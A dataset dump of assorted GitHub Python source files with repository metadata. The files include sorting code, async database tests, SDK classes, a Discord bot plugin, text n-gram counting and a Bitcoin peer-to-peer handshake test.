blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
92d7a6472e931edc858825d8e9d035a8f6ac359a | 772936057748d5cfb7fc8a4d521cfc223ebdd6f3 | /Insertion Sort/Insertion Sort.py | f5d104199fb7aec3f24326b91e1e77c210f27b04 | [] | no_license | xCE3/ChiCodesPython | 57e48b0b2b4fb355628a08dbe605d3b597513183 | a5e2600b66b16deee331804030add5eb47e1295f | refs/heads/master | 2020-06-13T16:33:13.677896 | 2019-07-31T16:00:52 | 2019-07-31T16:00:52 | 194,712,372 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | def insertion_sort(arr):
for i in range(1, len(arr)):
for j in range(i-1, -1, -1):
if arr[j] > arr[j+1]:
arr[j], arr[j+1] = arr[j+1], arr[j]
return arr
print(insertion_sort([2,8,5,3,10,9,-2,21,9])) | [
"noreply@github.com"
] | xCE3.noreply@github.com |
324f74a6c4f93ac617ebbd3b593a6080f88fe1d1 | 2a67dc681af4c4b9ef7a8e18c2ff75377dc5b44f | /aws.ec2.VpcEndpoint.basic-w-tags-python/__main__.py | ec260cab0c46c84539b68d1d8344454640761a1a | [] | no_license | ehubbard/templates-aws | e323b693a18234defe6bd56ffcc64095dc58e3a1 | 2ae2e7a5d05490078017fed6d132dcdde1f21c63 | refs/heads/master | 2022-11-17T13:53:14.531872 | 2020-07-10T21:56:27 | 2020-07-10T21:56:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | import pulumi
import pulumi_aws as aws
s3 = aws.ec2.VpcEndpoint("s3",
service_name="com.amazonaws.us-west-2.s3",
tags={
"Environment": "test",
},
vpc_id=aws_vpc["main"]["id"])
| [
"jvp@justinvp.com"
] | jvp@justinvp.com |
b818a9154b0d83fa3304579263317d182517db0d | d570d68fff337f2b14b61afe9d8cba6b228b3a6a | /tests/pep492/test_async_await.py | c9f0ceb66a15c1107515479aa795eb93daeb8e2e | [
"BSD-2-Clause"
] | permissive | meren/aiopg | bce6c50229061818e3d1a318c748479d1896881c | 798e41babe50394a0f7704d99c31d9d011fae16f | refs/heads/master | 2020-12-07T00:33:04.878681 | 2015-12-21T12:07:43 | 2015-12-21T12:07:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,452 | py | import unittest
import asyncio
import aiopg
class TestAsyncWith(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
self.database = 'aiopg'
self.user = 'aiopg'
self.host = '127.0.0.1'
self.password = 'aiopg'
def tearDown(self):
self.loop.close()
self.loop = None
async def connect(self, no_loop=False, **kwargs):
loop = None if no_loop else self.loop
conn = await aiopg.connect(database=self.database,
user=self.user,
password=self.password,
host=self.host,
loop=loop,
**kwargs)
self.addCleanup(conn.close)
return conn
def test_cursor_await(self):
async def go():
conn = await self.connect()
cursor = await conn.cursor()
await cursor.execute('SELECT 42;')
resp = await cursor.fetchone()
assert resp == (42, )
cursor.close()
self.loop.run_until_complete(go())
def test_connect_context_manager(self):
async def go():
kw = dict(database='aiopg', user='aiopg', password='passwd',
host='127.0.0.1', loop=self.loop)
async with aiopg.connect(**kw) as conn:
cursor = await conn.cursor()
await cursor.execute('SELECT 42')
resp = await cursor.fetchone()
assert resp == (42, )
cursor.close()
assert conn.closed
self.loop.run_until_complete(go())
def test_connection_context_manager(self):
async def go():
conn = await self.connect()
assert not conn.closed
async with conn:
cursor = await conn.cursor()
await cursor.execute('SELECT 42;')
resp = await cursor.fetchone()
assert resp == (42, )
cursor.close()
assert conn.closed
self.loop.run_until_complete(go())
def test_cursor_create_with_context_manager(self):
async def go():
conn = await self.connect()
async with conn.cursor() as cursor:
await cursor.execute('SELECT 42;')
resp = await cursor.fetchone()
assert resp == (42, )
assert not cursor.closed
assert cursor.closed
self.loop.run_until_complete(go())
def test_cursor_with_context_manager(self):
async def go():
conn = await self.connect()
cursor = await conn.cursor()
await cursor.execute('SELECT 42;')
assert not cursor.closed
async with cursor:
resp = await cursor.fetchone()
assert resp == (42, )
assert cursor.closed
self.loop.run_until_complete(go())
def test_cursor_lightweight(self):
async def go():
conn = await self.connect()
cursor = await conn.cursor()
await cursor.execute('SELECT 42;')
assert not cursor.closed
async with cursor:
pass
assert cursor.closed
self.loop.run_until_complete(go())
def test_pool_context_manager(self):
async def go():
pool = await aiopg.create_pool(host=self.host, user=self.user,
database=self.database,
password=self.password,
loop=self.loop)
async with pool:
conn = await pool.acquire()
async with conn.cursor() as cursor:
await cursor.execute('SELECT 42;')
resp = await cursor.fetchone()
assert resp == (42, )
pool.release(conn)
assert cursor.closed
assert pool.closed
self.loop.run_until_complete(go())
def test_create_pool_context_manager(self):
async def go():
async with aiopg.create_pool(host=self.host, user=self.user,
database=self.database,
password=self.password,
loop=self.loop) as pool:
async with pool.get() as conn:
async with conn.cursor() as cursor:
await cursor.execute('SELECT 42;')
resp = await cursor.fetchone()
assert resp == (42, )
assert cursor.closed
assert conn.closed
assert pool.closed
self.loop.run_until_complete(go())
def test_cursor_aiter(self):
async def go():
result = []
conn = await self.connect()
assert not conn.closed
async with conn:
cursor = await conn.cursor()
await cursor.execute('SELECT generate_series(1, 5);')
async for v in cursor:
result.append(v)
assert result == [(1,), (2, ), (3, ), (4, ), (5, )]
cursor.close()
assert conn.closed
self.loop.run_until_complete(go())
| [
"is.infinity@yahoo.com"
] | is.infinity@yahoo.com |
a4ad1faf3f8c1120766cdb1d029093ef98d85b5d | ddb38cabda8f8d1ad7c8a8b4af3698c4022ee9d6 | /examples/link.py | 9773c330149be4beda4f402ba295e9f813a6e7f8 | [
"MIT"
] | permissive | caofanCPU/rich | 6bc282ca3310cee3aa35f87a507fe3d79dda6af7 | cda20808ab645a239ac3538013bd6ba2d324bb45 | refs/heads/master | 2023-01-05T22:51:28.496542 | 2020-10-30T10:58:00 | 2020-10-30T10:58:00 | 289,209,964 | 2 | 0 | MIT | 2020-10-30T10:58:01 | 2020-08-21T07:45:54 | null | UTF-8 | Python | false | false | 192 | py | from rich import print
print("If your terminal supports links, the following text should be clickable:")
print("[link=https://www.willmcgugan.com][i]Visit [red]my[/red][/i] [yellow]Blog[/]")
| [
"willmcgugan@gmail.com"
] | willmcgugan@gmail.com |
a05ac4c0d8cc17a6a095d7611a3e500f21cf8e59 | 0b204928356d6825124787877b487b27bce19790 | /exercises/Chapter 07/07-17.py | 01e858f27ccd0bd3920b2a7326d164f1fb30dd65 | [] | no_license | shuxinzhang/nltk-learning | bff095f585bc42e697ca6cf523d71aec4a8aeeeb | 0428ec5d73b325c91f1d82fb26324482ca69aae4 | refs/heads/master | 2021-01-01T04:43:26.536545 | 2017-07-26T13:37:06 | 2017-07-26T13:37:06 | 97,234,566 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # -*- coding: utf-8 -*-
import matplotlib
matplotlib.use('TkAgg')
import nltk
'''
★
An n-gram chunker can use information other than the current
part-of-speech tag and the n-1 previous chunk tags.
Investigate other models of the context, such as
the n-1 previous part-of-speech tags, or some combination of
previous chunk tags along with previous and following part-of-speech tags.
''' | [
"amyzsx1217@gmail.com"
] | amyzsx1217@gmail.com |
38cedd932c2f25213428fe2e550d32592b7fec2f | efbe970cb374d4416c2c500a495994397ea18dd5 | /plugins/invites.py | bf0da04c4e1913d561661270ad7e34769e2cc491 | [
"MIT"
] | permissive | void-being/bepis-bot | f7d9fbc7663bb8a28c70e312fa4fb20c53c406c7 | 491b8de94b94384df6b26fa6a1325ee578020b7e | refs/heads/master | 2020-07-11T17:28:10.080879 | 2018-11-15T23:44:06 | 2018-11-15T23:44:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | from logging import getLogger
from utils.common import GENERAL_CHANNEL
from utils.db import InviteDatabase, Database
from utils.deco import ensure_profile
from disco.api.http import APIException
from disco.bot import Plugin
class InvitePlug(Plugin):
def load(self, config):
self.invite_db = InviteDatabase()
self.db = Database("InvitePlug")
self.logger = getLogger("InvitePlug")
super().load(config)
self.logger.info("Finished loading invite plugin")
@Plugin.listen("GuildMemberAdd")
def on_member(self, event):
if self.invite_db.already_joined(event):
self.logger.info("User {0} has rejoined the server".format(event.user.id))
else:
for invite in self.invite_db:
try:
invite_obj = event.client.api.invites_get(invite['invite_code'])
print(invite_obj.uses, "/", invite_obj.max_uses)
except APIException:
self.logger.info("Invite revoked! Rewarding accordingly")
self.db.create_user(event.user)
invited = self.db.find_user(event.user.id)
inviter = self.db.find_user(invite['user_id'])
invited.bepis += 20
inviter.bepis += 30
event.client.api.channels_messages_create(
GENERAL_CHANNEL,
"Thanks for inviting <@{0}>, <@{1}>. You've earned 30 bepis and"
" <@{1}> earned 20 for using the referral link".format(invited.user_id, inviter.user_id)
)
self.invite_db.remove_invite(invite['invite_code'])
self.logger.info("Removed invite and rewarded users")
break
else:
self.db.create_user(event.user)
self.logger.info("Created account for User {0}".format(event.user.id))
@Plugin.command("invite")
@ensure_profile
def create_invite(self, event, user):
invite = self.invite_db.invites.find_one({"user_id": user.user_id})
if invite:
invite_code = invite['invite_code']
else:
invite = event.msg.channel.create_invite(
max_age=0,
max_uses=1,
unique=True
)
invite_code = invite.code
self.invite_db.register_invite(invite_code, user.user_id)
event.msg.reply("There! Here's your referral link. Whenever a person joins with this link, you'll get 30 bepis"
"and they'll get 20. Make sure to get a new link after inviting someone! https://discord.gg/"
+ invite_code)
| [
"zwork101@gmail.com"
] | zwork101@gmail.com |
5974adfcd647a183ebd24dc44138ee6aea00339a | 284d146079ff247ce46a06f08e3651551ea4a6bd | /n_grams.py | 934161b64db190d9a55cd08baa067f16ba2cf3e4 | [] | no_license | massyah/GRN-analysis | e872e36d7c07ad9674391c7ca017d3c55342ab7d | 1f985555198693cc9be21d70d1c93050f0ad2f9a | refs/heads/master | 2021-01-10T21:11:28.267953 | 2017-01-10T20:40:03 | 2017-01-10T20:40:03 | 1,071,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py | #!/usr/bin/env python
# encoding: utf-8
import copy
# project="Th17 differentiation"
# termFile=project+"/articles_th17.txt"
# pubmed_files=[f for f in os.listdir("./"+project) if f.startswith("entrez ")]
stop_words=open("stop_words.txt").readlines()
stop_words=[x.strip() for x in stop_words]
occ_number={}
exemple_sentences={}
n_grams_occurences={}
def build_n_grams(n,table):
n_grams=[]
for i in range(0,len(table)-n+1):
n_grams.append(tuple(table[i:i+n]))
return n_grams
# toRemove=re.compile("|".join(["of","the","in","for","with","by","this","well","as"]))
def tokenize_sentence(s):
s=s.replace("(","")
s=s.replace(")","")
s=s.replace(",","")
splitted=[]
recognized=allTermsRe.findall(s)
for parts in allTermsRe.split(s):
if (parts in recognized):
parts=parts.lower()
if "_"+parts in allTerms:
parts="_"+parts
splitted.append(allTerms[parts].name)
else:
for w in parts.split():
if w.lower() in stop_words:
continue
w=w.lower()
w=w.strip(",.")
splitted.append(w.lower())
return splitted
def compute_occurences():
global occ_number,n_grams_occurences
occ_number={}
n_grams_occurences={}
for s in allSentences:
#we get rid of ()
s=s.string
splitted=[]
tokens=tokenize_sentence(s)
for tok in tokens:
if tok not in occ_number:
occ_number[tok]=0
occ_number[tok]+=1
if tok not in exemple_sentences:
exemple_sentences[tok]=[]
exemple_sentences[tok].append(s)
for i in range(2,6):
grams=build_n_grams(i,tokens)
for g in grams:
g=tuple(g)
if g not in n_grams_occurences:
n_grams_occurences[g]=0
if g not in exemple_sentences:
exemple_sentences[g]=[]
n_grams_occurences[g]+=1
exemple_sentences[g].append(s)
# print occ_number
#we first build the frequencies of terms related to all publications
allPublications={}
allSentences=[]
allTerms={}
allTermsRe=None
allPredicates=[]
uid=0
sentencesUid=0
evidencesUid=0
pubmedIdTopub={}
nxG=None
project="Th17 differentiation"
termFile="Th17 differentiation human/th17_human_terms.txt"
pubmed_files=[f for f in os.listdir("./"+project) if f.startswith("entrez ")]
parse_file(termFile)
compute_occurences()
occ_number_general=copy.copy(occ_number)
n_grams_occurences_general=copy.copy(n_grams_occurences)
exemple_sentences_general=copy.copy(exemple_sentences)
n_sents_general=len(allSentences)
print "General term frequencies computed"
allPublications={}
allSentences=[]
allPredicates=[]
pubmedIdTopub={}
nxG=None
project="Th17 differentiation human"
termFile=project+"/th17_human_terms.txt"
pubmed_files=[f for f in os.listdir("./"+project) if f.startswith("entrez ")]
pubmed_files.append("pubmed_result.txt")
parse_file(termFile)
occ_number={}
exemple_sentences={}
n_grams_occurences={}
compute_occurences()
n_sents=len(allSentences)
print "Human specific frequencies computed"
diff_freq={}
for k,v in occ_number.items():
if k not in diff_freq:
diff_freq[k]=0
if k not in occ_number_general:
diff_freq[k]=1.0*v/n_sents
else:
diff_freq[k]=1.0*occ_number[k]/n_sents-1.0*occ_number_general[k]/n_sents_general
#sort the dicts by freqs
occ_number=occ_number.items()
occ_number.sort(key=lambda x:x[1],reverse=True)
occ_number_general=occ_number_general.items()
occ_number_general.sort(key=lambda x:x[1],reverse=True)
n_grams_occurences=[x for x in n_grams_occurences.items() if x[1]>3]
n_grams_occurences.sort(key=lambda x:x[1],reverse=True)
n_grams_occurences_general=[x for x in n_grams_occurences_general.items() if x[1]>3]
n_grams_occurences_general.sort(key=lambda x:x[1],reverse=True)
diff_freq=diff_freq.items()
diff_freq.sort(key=lambda x:x[1],reverse=True)
| [
"massyah@gmail.com"
] | massyah@gmail.com |
3dbda848af9311c79540f19a16701a5fa967df65 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/KoubeiItemExtitemQueryResponse.py | dcc088d4e0ab28be40c13158601fdb346f4422aa | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 855 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.ExtItem import ExtItem
class KoubeiItemExtitemQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiItemExtitemQueryResponse, self).__init__()
self._extitem = None
@property
def extitem(self):
return self._extitem
@extitem.setter
def extitem(self, value):
if isinstance(value, ExtItem):
self._extitem = value
else:
self._extitem = ExtItem.from_alipay_dict(value)
def parse_response_content(self, response_content):
response = super(KoubeiItemExtitemQueryResponse, self).parse_response_content(response_content)
if 'extitem' in response:
self.extitem = response['extitem']
| [
"liuqun.lq@alibaba-inc.com"
] | liuqun.lq@alibaba-inc.com |
1f4f4feed8d738e787ed86e3d7022992d076cb0f | 648f427a9d9a73720f76df972be2983354e13b61 | /test/functional/p2p-leaktests.py | 74f52f84f1e26ac02479c2fe64a636ad5c488e14 | [
"MIT"
] | permissive | aixinwang/Gfc | e659850e398dc9ab8b6a697b9262462a8e316e8a | 4a7fdac234f5f51055e471e77aaff62cfa4c6eab | refs/heads/master | 2021-04-03T08:33:03.198293 | 2018-03-14T04:32:38 | 2018-03-14T04:32:38 | 125,152,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,654 | py | #!/usr/bin/env python3
# Copyright (c) 2017 The GFC coin bt developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test message sending before handshake completion.
A node should never send anything other than VERSION/VERACK/REJECT until it's
received a VERACK.
This test connects to a node and sends it a few messages, trying to intice it
into sending us something it shouldn't.
"""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
banscore = 10
class CLazyNode(NodeConnCB):
def __init__(self):
super().__init__()
self.unexpected_msg = False
self.ever_connected = False
def bad_message(self, message):
self.unexpected_msg = True
self.log.info("should not have received message: %s" % message.command)
def on_open(self, conn):
self.connected = True
self.ever_connected = True
def on_version(self, conn, message): self.bad_message(message)
def on_verack(self, conn, message): self.bad_message(message)
def on_reject(self, conn, message): self.bad_message(message)
def on_inv(self, conn, message): self.bad_message(message)
def on_addr(self, conn, message): self.bad_message(message)
def on_alert(self, conn, message): self.bad_message(message)
def on_getdata(self, conn, message): self.bad_message(message)
def on_getblocks(self, conn, message): self.bad_message(message)
def on_tx(self, conn, message): self.bad_message(message)
def on_block(self, conn, message): self.bad_message(message)
def on_getaddr(self, conn, message): self.bad_message(message)
def on_headers(self, conn, message): self.bad_message(message)
def on_getheaders(self, conn, message): self.bad_message(message)
def on_ping(self, conn, message): self.bad_message(message)
def on_mempool(self, conn): self.bad_message(message)
def on_pong(self, conn, message): self.bad_message(message)
def on_feefilter(self, conn, message): self.bad_message(message)
def on_sendheaders(self, conn, message): self.bad_message(message)
def on_sendcmpct(self, conn, message): self.bad_message(message)
def on_cmpctblock(self, conn, message): self.bad_message(message)
def on_getblocktxn(self, conn, message): self.bad_message(message)
def on_blocktxn(self, conn, message): self.bad_message(message)
# Node that never sends a version. We'll use this to send a bunch of messages
# anyway, and eventually get disconnected.
class CNodeNoVersionBan(CLazyNode):
# send a bunch of veracks without sending a message. This should get us disconnected.
# NOTE: implementation-specific check here. Remove if bitcoind ban behavior changes
def on_open(self, conn):
super().on_open(conn)
for i in range(banscore):
self.send_message(msg_verack())
def on_reject(self, conn, message): pass
# Node that never sends a version. This one just sits idle and hopes to receive
# any message (it shouldn't!)
class CNodeNoVersionIdle(CLazyNode):
def __init__(self):
super().__init__()
# Node that sends a version but not a verack.
class CNodeNoVerackIdle(CLazyNode):
def __init__(self):
self.version_received = False
super().__init__()
def on_reject(self, conn, message): pass
def on_verack(self, conn, message): pass
# When version is received, don't reply with a verack. Instead, see if the
# node will give us a message that it shouldn't. This is not an exhaustive
# list!
def on_version(self, conn, message):
self.version_received = True
conn.send_message(msg_ping())
conn.send_message(msg_getaddr())
class P2PLeakTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.extra_args = [['-banscore='+str(banscore)]]
def run_test(self):
no_version_bannode = CNodeNoVersionBan()
no_version_idlenode = CNodeNoVersionIdle()
no_verack_idlenode = CNodeNoVerackIdle()
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], no_version_bannode, send_version=False))
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], no_version_idlenode, send_version=False))
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], no_verack_idlenode))
no_version_bannode.add_connection(connections[0])
no_version_idlenode.add_connection(connections[1])
no_verack_idlenode.add_connection(connections[2])
NetworkThread().start() # Start up network handling in another thread
assert wait_until(lambda: no_version_bannode.ever_connected, timeout=10)
assert wait_until(lambda: no_version_idlenode.ever_connected, timeout=10)
assert wait_until(lambda: no_verack_idlenode.version_received, timeout=10)
# Mine a block and make sure that it's not sent to the connected nodes
self.nodes[0].generate(1)
#Give the node enough time to possibly leak out a message
time.sleep(5)
#This node should have been banned
assert not no_version_bannode.connected
[conn.disconnect_node() for conn in connections]
# Make sure no unexpected messages came in
assert(no_version_bannode.unexpected_msg == False)
assert(no_version_idlenode.unexpected_msg == False)
assert(no_verack_idlenode.unexpected_msg == False)
if __name__ == '__main__':
P2PLeakTest().main()
| [
"your_email@youremail.com"
] | your_email@youremail.com |
3a056a7330c5f4fa3afb79da1bd70e37f1fd2f32 | 9e4eab70447a892becf36cec0e656318d27a26f3 | /core/middlewares/common.py | f10909e45820993e0991bb19f280a120a1d8637d | [
"MIT"
] | permissive | aldwyn-acn/effigia | 7afa8f52641e2cdcbf69a66a593a4a58191c9b9b | cd105ee3a938785791cff474fd2959352a41a6a6 | refs/heads/master | 2020-03-31T01:04:49.710702 | 2019-07-30T23:12:32 | 2019-07-30T23:12:32 | 151,765,928 | 0 | 0 | null | 2018-10-05T19:03:27 | 2018-10-05T19:03:27 | null | UTF-8 | Python | false | false | 1,629 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from actstream import action
from django.utils.deprecation import MiddlewareMixin
from apps.galleries.views import GalleryItemView
from apps.galleries.models import Gallery
from apps.portfolios.views import PortfolioItemView
from apps.portfolios.models import Portfolio
from apps.groups.views import GroupItemView
from apps.groups.models import Group
MODELS_FOR_SAVING_VISITS = {
GalleryItemView: Gallery,
GroupItemView: Group,
PortfolioItemView: Portfolio,
}
class MiddlewareObjectMixin(object):
def get_object(self, klass, **kwargs):
if kwargs.get('slug'):
return klass.objects.get(slug=kwargs['slug'])
def is_item_view(self, view_func, view_kwargs):
return (hasattr(view_func, 'view_class') and
view_func.view_class in MODELS_FOR_SAVING_VISITS and
view_kwargs.get('slug'))
class EffigiaVisitMiddleware(MiddlewareObjectMixin, MiddlewareMixin):
def process_view(self, request, view_func, view_args, view_kwargs):
""" Save an action for the visited objects of the current user """
if (self.is_item_view(view_func, view_kwargs)):
klass = MODELS_FOR_SAVING_VISITS[view_func.view_class]
obj = self.get_object(klass, **view_kwargs)
if request.user.is_authenticated():
action.send(request.user, verb='visited a %s' % obj._meta.verbose_name, target=obj)
else:
obj.anonymous_visits_count += 1
obj.save()
return view_func(request, *view_args, **view_kwargs)
| [
"aldwyn.up@gmail.com"
] | aldwyn.up@gmail.com |
64286712f027df5f47a92489c32b3602446d79b1 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/40/usersdata/102/24477/submittedfiles/funcoes.py | 85696e1d61292798d9f6040a5edaa4363fc470ec | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | from __future__ import division
import numpy as np
def calcula_valor_absoluto(x):
if x<0:
x=x*(-1)
return x
else:
return x
def cacula_pi(m):
soma=0
i=1
j=2
while i<=m:
if 1<=m and m<=2000:
if i%2==0:
soma=soma-(4/(j*(j+1)*(j+2)))
else:
soma=soma+(4/(j*(j+1)*(j+2)))
i=i+1
j=j+2
pi=3+soma
return pi
def fatorial(a):
fatorial=1
for i in range(1,a+1,1):
fatorial=fatorial*i
return fatorial
def calcula_cos_seno(z,epsilon):
i=1
j=2
soma=0
termo=((2**j)/fatorial(j))
while termo>epsilon:
if i%2!=0:
soma=soma-termo
else:
somaa=soma+termo
i=i+1
j=j+2
termo=((2**j)/aatorial(j))
cosseno=1+soma
return cosseno
def calcula_razao_aurea(m,epsilon):
calcula_razao_aurea=2*(calcula_cos_seno(calcula_pi(m)/5.0,epsilon))
return razao_aurea
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
eb7c2a0bb4df36ca0ef54c23c6537d071bfdd2b2 | 074421d31af92ae29c7c78bdb7e50f199a38eb9b | /weixin/code/moc_def/moc_name_service/AppInstance.py | 41252cf3e8a2d8fe37562e79a7e9fb9cf03cbae0 | [] | no_license | allenforrest/wxbiz | 3f49ce66b37e281fc375f548610aa54a0f73268f | e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f | refs/heads/master | 2016-09-06T15:17:49.420934 | 2013-08-05T13:13:40 | 2013-08-05T13:13:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,356 | py | #coding=gbk
import mit
from mit import MocBase, MocRule
from mit import MocAttrDef, ComplexAttrDef
import type_def
import err_code_mgr
# The automatic generated MOC. It is not recommended to inherit.
class AppInstance(MocBase):
__MOC_NAME__ = "AppInstance"
__IMC_SYNC_PRIORITY__ = mit.IMC_SYNC_NOT_SYNC
__ATTR_DEF__ = (
MocAttrDef(name = 'pid', is_key = True, attr_type = type_def.TYPE_UINT32, max_len = 0),
MocAttrDef(name = 'instance_name', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
MocAttrDef(name = 'service_name', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
MocAttrDef(name = 'instance_id', is_key = False, attr_type = type_def.TYPE_UINT32, max_len = 0),
MocAttrDef(name = 'system_ip', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
MocAttrDef(name = 'node_type', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
MocAttrDef(name = 'endpoint', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
MocAttrDef(name = 'endpoint_protocol', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
MocAttrDef(name = 'update_time', is_key = False, attr_type = type_def.TYPE_UINT32, max_len = 64),
MocAttrDef(name = 'state', is_key = False, attr_type = type_def.TYPE_STRING, max_len = 64),
)
__COMPLEX_ATTR_DEF__ = (
)
__ATTR_DEF_MAP__ = {attr.name:attr for attr in __ATTR_DEF__ + __COMPLEX_ATTR_DEF__}
__ATTR_INDEX__ = ()
__SQLITE_SELECT_SQL__ = 'select [moid], [pid], [instance_name], [service_name], [instance_id], [system_ip], [node_type], [endpoint], [endpoint_protocol], [update_time], [state] from tbl_AppInstance'
__ORACLE_SELECT_SQL__ = 'select "moid", "pid", "instance_name", "service_name", "instance_id", "system_ip", "node_type", "endpoint", "endpoint_protocol", "update_time", "state" from tbl_AppInstance'
__SQLITE_INSERT_SQL__ = 'insert into tbl_AppInstance ([moid], [pid], [instance_name], [service_name], [instance_id], [system_ip], [node_type], [endpoint], [endpoint_protocol], [update_time], [state]) values(?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11)'
__ORACLE_INSERT_SQL__ = 'insert into tbl_AppInstance ("moid", "pid", "instance_name", "service_name", "instance_id", "system_ip", "node_type", "endpoint", "endpoint_protocol", "update_time", "state") values(:1, :2, :3, :4, :5, :6, :7, :8, :9, :10, :11)'
__SQLITE_UPDATE_SQL__ = 'update tbl_AppInstance set [instance_name]=?1, [service_name]=?2, [instance_id]=?3, [system_ip]=?4, [node_type]=?5, [endpoint]=?6, [endpoint_protocol]=?7, [update_time]=?8, [state]=?9 where [moid]=?10'
__ORACLE_UPDATE_SQL__ = 'update tbl_AppInstance set "instance_name"=:1, "service_name"=:2, "instance_id"=:3, "system_ip"=:4, "node_type"=:5, "endpoint"=:6, "endpoint_protocol"=:7, "update_time"=:8, "state"=:9 where "moid"=:10'
pid = 0
instance_name = ''
service_name = ''
instance_id = 0
system_ip = ''
node_type = ''
endpoint = ''
endpoint_protocol = ''
update_time = 0
state = ''
@classmethod
def gen_moid(cls, **kw):
return "AppInstance_%d" % (kw["pid"])
def get_moid(self):
return "AppInstance_%d" % (self.pid)
@classmethod
def get_attr_names(cls):
return ('pid',), ('instance_name', 'service_name', 'instance_id', 'system_ip', 'node_type', 'endpoint', 'endpoint_protocol', 'update_time', 'state')
def from_db_record(self, record):
self.pid = record[1]
self.instance_name = record[2]
self.service_name = record[3]
self.instance_id = record[4]
self.system_ip = record[5]
self.node_type = record[6]
self.endpoint = record[7]
self.endpoint_protocol = record[8]
self.update_time = record[9]
self.state = record[10]
def to_db_record(self):
return [self.get_moid()
, self.pid
, self.instance_name
, self.service_name
, self.instance_id
, self.system_ip
, self.node_type
, self.endpoint
, self.endpoint_protocol
, self.update_time
, self.state
]
def to_db_record_for_update(self):
return [
self.instance_name
, self.service_name
, self.instance_id
, self.system_ip
, self.node_type
, self.endpoint
, self.endpoint_protocol
, self.update_time
, self.state
, self.get_moid()
]
# The automatic generated rule.
class AppInstanceRule(MocRule):
pass
| [
"allenxu@gmail.com"
] | allenxu@gmail.com |
ada4adc8aad13242a94e5cb34122128661463484 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/aio/operations/_backup_protection_containers_operations.py | b6c5c15dd38539be1b961241d550d8eab0ed5a1e | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 6,734 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
